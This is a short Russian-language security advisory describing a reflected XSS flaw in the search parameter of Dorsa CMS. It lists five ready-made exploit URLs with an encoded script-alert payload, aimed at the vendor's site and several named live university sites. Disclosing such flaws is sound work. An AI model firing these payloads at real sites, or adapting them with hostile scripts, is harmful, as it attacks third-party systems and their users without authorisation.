Программа: Dorsa CMS

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "search" сценарием Default_.aspx (когда "Page_" установлен "search").
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Эксплоит:

http://www.dorsacms.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E

http://www.iauksh.ac.ir/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E

http://www.iaun.ac.ir/cms/dorsa/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_server%27%29%3C%2Fscript%3E

http://iaumajlesi.ac.ir/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_server%27%29%3C%2Fscript%3E

http://bsiesfahan.ir/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_server%27%29%3C%2Fscript%3E



Оставить мнение